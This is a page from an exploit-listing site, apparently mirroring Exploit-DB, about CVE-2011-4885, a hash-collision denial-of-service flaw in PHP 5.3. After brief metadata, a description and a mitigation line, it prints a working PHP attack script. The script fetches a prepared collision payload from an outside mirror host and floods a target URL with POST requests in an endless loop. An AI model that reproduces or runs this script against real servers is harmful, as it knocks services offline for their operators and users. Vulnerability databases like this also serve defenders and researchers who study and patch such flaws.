Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
CVE-2011-4885 PHP Hashtables Denial of Service - exploit.company
header-logo
Suggest Exploit
vendor:
PHP
by:
infodox
7.5
CVSS
HIGH
Denial of Service
693
CWE
Product Name: PHP
Affected Version From: 5.3.*
Affected Version To: 5.3.*
Patch Exists: NO
Related CWE: CVE-2011-4885
CPE: a:php:php:5.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-1358-1/https://www.rapid7.com/db/vulnerabilities/php-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/apple-osx-loginwindow-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2012-41/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0093/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0092/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/debian-DSA-2403/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2012-0093/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-3fd040be-4f0b-11e1-9e32-0025900931f8/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-0830/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2012-0092/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-4885/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2011-4885/https://www.rapid7.com/db/?q=CVE-2011-4885&type=&page=2https://www.rapid7.com/db/?q=CVE-2011-4885&type=&page=2
Other Scripts:
Platforms Tested: Linux
2011

CVE-2011-4885 PHP Hashtables Denial of Service

This exploit targets a vulnerability in PHP version 5.3.* which allows an attacker to perform a denial of service attack. The exploit utilizes hash collisions to overload the system and cause it to crash.

Mitigation:

Upgrade to a patched version of PHP or implement proper input validation to prevent hash collisions.
Source

Exploit-DB raw data:

  

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service
Exploit
 # Date: 1/1/12
 # Author: infodox
 # Software Link: php.net
 #
Version: 5.3.*
 # Tested on: Linux
 # CVE : CVE-2011-4885 

Exploit
Download -- http://infodox.co.cc/Downloads/phpdos.txt 

<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>

Navigation

Suggest Exploit

Services By CQR